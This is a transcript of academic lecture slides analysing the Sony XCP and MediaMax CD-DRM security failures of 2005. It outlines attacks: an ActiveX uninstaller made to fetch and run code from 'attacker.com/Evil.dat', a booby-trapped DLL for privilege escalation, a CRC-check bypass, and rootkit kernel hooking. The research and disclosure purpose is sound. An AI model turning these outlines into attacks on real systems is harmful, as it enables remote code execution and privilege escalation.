Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of."— Presentation transcript:

1 1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University

2 2 J. Alex Halderman The “Episode” - Fall 2005 World’s second largest music company Major anti-piracy plan, gone badly awry Millions of copies of dangerous software Hundreds of thousands of PCs at risk International protests, class-action suits Multi-million dollar recall, settlements Changed perceptions of DRM—showed can be a security threat

3 3 J. Alex Halderman First4InternetSunnComm “Light years beyond encryption™” 52 titles 4.7 million discs 37 titles 20 million discs

4 4 J. Alex Halderman Research in the Blogosphere 27 blog posts, 100’s of comments Rapid collaboration with researchers (and amateurs) around the world Paper sections posted online while writing

5 5 J. Alex Halderman Our Contributions XCP rootkit privilege escalation attack XCP and MediaMax uninstaller remote exploits MM patch triggers the attack it purports to fix MM spyware-like behaviors MM watermark technology analysis and attacks Analysis and holes in active and passive CD DRM XCP contains GPL code to work with iPod DRM Analysis of CD DRM security problems in the broader context of computer security

6 6 J. Alex Halderman CD DRM CD Players Plays normally Computers Restricted use e.g. Can’t copy disc Can’t rip as MP3 Can’t use on iPod

7 7 J. Alex Halderman How CD DRM Works First time a protected CD is inserted… 1.Autorun (normal Windows feature) executes installer from the CD 2.Installs active protection driver, between CD driver and apps 3.Driver remains on system Drivers Ripper/copier Application OS Protection driver

8 8 J. Alex Halderman How CD DRM Works Drivers Ripper/copier Application OS Protection driver Normal CD Drivers Ripper/copier Application OS Protection driver  # CD marked as protected User tries to rip or copy a disc… 1.Protection driver checks for watermark 2.If found, blocks access to audio

9 9 J. Alex Halderman Taxonomy of Attacks Prevent installation –Shift key –Magic marker –Non-Windows OS Interfere with watermark detection Disable or remove protection software

10 10 J. Alex Halderman DRM Challenges  Bad Behavior DRM weaknesses prompted vendors to resort to dangerous/unethical techniques that jeopardized user security –XCP rootkit –MM aggressive installation –XCP and MM ActiveX-based uninstallers

11 11 J. Alex Halderman The XCP Rootkit DRM challenge: Users will remove active protection XCP’s response: Install a rootkit to conceal the software

12 12 J. Alex Halderman XCP Rootkit: Discovery Mark Russinovich October 31, 2005

13 13 J. Alex Halderman XCP Rootkit: Operation Magic prefix: $sys$ Files Processes Registry keys Hidden

14 14 J. Alex Halderman XCP Rootkit: Problems Local privilege escalation –Hidden objects not limited to XCP software –Malware ran by non-privileged users can’t install own rootkit, but can utilize XCP’s –Use to hide from virus checkers, admin tools Exploits in wild Backdoor.Ryknos.B Trojan.Welomoch

15 15 J. Alex Halderman “Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse President, Sony BMG Global Digital Business “It’s very important to remember that it’s your intellectual property — it’s not your computer. And in the pursuit of protection of intellectual property, it’s important not to defeat or undermine the security measures that people need to adopt in these days.” — Stewart Baker Asst. U.S. Secretary of Homeland Security

16 16 J. Alex Halderman MediaMax Aggressive Installer DRM challenge: Users will decline to install protection software MM’s response: Install aggressively, regardless of consent

17 17 J. Alex Halderman MediaMax Installation 13+ MB installed before EULA screen Commonly, active protection permanently activated even if EULA declined

18 18 J. Alex Halderman MediaMax Installation: Problem Everyone — Full Control Jesse Burns and Alex Stamos December 6, 2005

19 19 J. Alex Halderman MediaMax Installation: Attack 1.Attacker prepares booby-trapped MediaMax.dll, malicious code in DllMain() function 2.Non-privileged user replaces installed file with attack version 3.Privileged user inserts CD 4.Even before displaying a EULA, software on CD calls MediaMax.dll code to check version 5.Attack code runs with privileges

20 20 J. Alex Halderman Aggression Exacerbates Repairs Permissions reset to non-secure state whenever disc inserted. Sony releases patch… …but, the patch calls code in MediaMax.dll. If already booby- trapped, will set off attack code. How do users know they need to patch? Vulnerable even if have refused installation.

21 21 J. Alex Halderman XCP and MediaMax Uninstallers DRM challenge: Angry customers demand to uninstall protection software XCP and MM response: Offer uninstallers, but use online design to limit access

22 22 J. Alex Halderman XCP Uninstaller: Step 1

23 23 J. Alex Halderman XCP Uninstaller: Step 2 Wait for email (hours)

24 24 J. Alex Halderman XCP Uninstaller: Step 3

25 25 J. Alex Halderman XCP Uninstaller: Step 4 Wait for second email (several days)

26 26 J. Alex Halderman XCP Uninstaller: Step 5 Finally, visit web page and run uninstaller* * But if you insert the CD again, go back to step 1!

27 27 J. Alex Halderman XCP Uninstaller: Operation “HTTP GET /XCP.dat” XCP Uninstall web page: CodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”) Server sony-bmg.com XCP.dat Client CodeSupport.ocx Client extracts InstallLite.dll from XCP.dat, calls function UnInstall_xcp ActiveX control will accept arbitrary URL Code from that URL is not authenticated Control is not removed after use Problems: 1. 2. 3.

28 28 J. Alex Halderman XCP Uninstaller: Attack “HTTP GET /Evil.dat” Victim visits attacker’s web page: CodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”) Server attacker.com Evil.dat Client CodeSupport.ocx Client extracts InstallLite.dll from Evil.dat, calls function UnInstallXCP Attack code runs with local user’s privileges. 2. 3. 4. Attacker constructs Evil.dat1. Creates InstallLite.dll and puts attack code in UninstallXCP function

29 29 J. Alex Halderman MediaMax Uninstaller “Oops!... I did it again”

30 30 J. Alex Halderman MediaMax Uninstaller “GET /validate.asp?key=3984-…” MediaMax Uninstall web page: AxWebRemove.Remove(3984-9201-0039-2257, “http://www.sunncomm.com/validate.asp”) Server sunncomm.com “http://sunncomm.com/webrem.dll” Client AxWebRemove.ocx Client calls function ECF7() from WebRem.dll 1. 2. 4. “GET /webrem.dll” Server sunncomm.com WebRem.dll Client AxWebRemove.ocx 3.

31 31 J. Alex Halderman Aftermath XCP discs recalled; MediaMax halted …but still in many stores and CD collections Major class-action suits settled Customers can trade discs for cash, MP3 downloads, and non-DRM versions Sony won’t use CD DRM, for now

32 32 J. Alex Halderman Takeaway Lessons Aggressive DRM can have dangerous consequences: harm to user security Effective DRM may require undermining the user’s control…and thus ability to defend against security threats Look for similar problems in the future

33 33 J. Alex Halderman The Stakes are High Bad DRM can… Harm users Create major liability for content owners Reduce sales for artists Ultimately, reduce incentives to create

34 34 J. Alex Halderman www.freedom-to-tinker.com Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University

35 35 J. Alex Halderman Chronology 31Oct. 3Nov. 10 14 15 17 6Dec. 7 30 Oct.31Rootkit revealed Nov.3 Sony releases XCP patch 10First suits filed against Sony 14XCP patch/uninstaller hole 15Sony recalls XCP discs 17 MediaMax uninstaller hole Dec.6MediaMax player hole 7Hole in patch for MediaMax player hole 30First suits settled

36 36 J. Alex Halderman XCP Rootkit: Operation KeQueryDirectoryFile0x8060bb9c KeCreateFile0x8056b9c8 KeQuerySystemInformation0x805ca104 KeEnumerateKey0x805010d0 KeOpenKey0x805c9e3c …… KeServiceDescriptorTable Application int KeQueryDirectoryFile(…) { … } KeQueryDirectoryFile(…); 0x8060bb9c: Windows Kernel Normal Windows system call (List files in a directory)

37 37 J. Alex Halderman KeQueryDirectoryFile0x0f967bfa KeCreateFile0x8056b9c8 KeQuerySystemInformation0x805ca104 KeEnumerateKey0x805010d0 KeOpenKey0x805c9e3c …… KeServiceDescriptorTable Application int KeQueryDirectoryFile(…) { … } KeQueryDirectoryFile(…); 0x8060bb9c: Windows Kernel int Rootkit_QueryDirectoryFile(…) {… if filename begins with “$sys$”: remove from results 0xf967bfa: Rootkit (Aries.sys) XCP Rootkit: Operation

38 38 J. Alex Halderman Constructing Evil.dat Archive files protected with proprietary CRC 1.Prepare Evil.dat with random CRC 2.Run with breakpoint at line 2 3.Take computed CRC and place in Evil.dat Header: Name=“UninstallXCP.dat” CRC=0x03cb1a88 ActiveX control: 1.C = ComputeCRC( ) 2.If C != Header.CRC then Terminate 3.Extract and execute file Lesson: Use a digital signature!

39 39 J. Alex Halderman CD DRM as Spyware Both XCP and MediaMax: “Phone home” about each title played despite privacy statement to the contrary Ship without a meaningful uninstaller Install without consent or exceed consent Spyware is hard to define, but these meet most common definitions.

Download ppt "1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of."

Similar presentations

Keep Your PC Safe (Windows 7, Vista or XP) Nora Lucke 02/05/2012 Documents - security.

Keep Your PC Safe (Windows 7, Vista or XP) Nora Lucke 02/05/2012 Documents - security.
Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman.

Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman.
1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.

1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
 Application software consists of programs designed to make users more productive and/or assist with personal tasks.  Growth of internet simplified.

 Application software consists of programs designed to make users more productive and/or assist with personal tasks.  Growth of internet simplified.
Day 4-1-1 anti-virus 3-3-1.anti-virus 1 detecting a malicious file malware, detection, hiding, removing.

Day anti-virus anti-virus 1 detecting a malicious file malware, detection, hiding, removing.
1 The Sony CD DRM Debacle A case study of digital rights management.

1 The Sony CD DRM Debacle A case study of digital rights management.
3 Section C: Installing Software and Upgrades  Web Apps  Mobile Apps  Local Applications  Portable Software  Software Upgrades and Updates  Uninstalling.

3 Section C: Installing Software and Upgrades  Web Apps  Mobile Apps  Local Applications  Portable Software  Software Upgrades and Updates  Uninstalling.
CD DRM & SONY-BMG: a case study Muhammed Afzal Hussain Digital Rights Management Seminar 17 th May, 2006.

CD DRM & SONY-BMG: a case study Muhammed Afzal Hussain Digital Rights Management Seminar 17 th May, 2006.
1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy.

1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy.
To Protect or Not Protect - - - Sony/BMG’s DRM Dilemma Sony’s Attempt-- Sony/BMG’s digital right’s management (DRM) “rootkit” inclusion on their music.

To Protect or Not Protect Sony/BMG’s DRM Dilemma Sony’s Attempt-- Sony/BMG’s digital right’s management (DRM) “rootkit” inclusion on their music.
The Downside to DRM. What is DRM? “Digital Rights Management” Software used to control access to copyrighted material Protect company from piracy.

The Downside to DRM. What is DRM? “Digital Rights Management” Software used to control access to copyrighted material Protect company from piracy.
Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.

Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.
Rootkits: Sneaky, Stealthy Toolboxes

Rootkits: Sneaky, Stealthy Toolboxes
Chapter 9 Security 9.7 - 9.8 Malware Defenses. Malware Can be used for a form of blackmail. Example: Encrypts files on victim disk, then displays message.

Chapter 9 Security Malware Defenses. Malware Can be used for a form of blackmail. Example: Encrypts files on victim disk, then displays message.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
February 28, 2005 1 The Sony BMG DRM Debacle Corynne McSherry, Staff Attorney.

February 28, The Sony BMG DRM Debacle Corynne McSherry, Staff Attorney.
No.24 Prerawat Denvutivorkarn M.2/2. Definition: antivirus is protective software designed to defend your computer against malicious software. Malicious.

No.24 Prerawat Denvutivorkarn M.2/2. Definition: "antivirus" is protective software designed to defend your computer against malicious software. Malicious.
Chapter Nine Maintaining a Computer Part III: Malware.

Chapter Nine Maintaining a Computer Part III: Malware.
Microsoft ® Official Course Module 9 Configuring Applications.

Microsoft ® Official Course Module 9 Configuring Applications.

Similar presentations

Ads by Google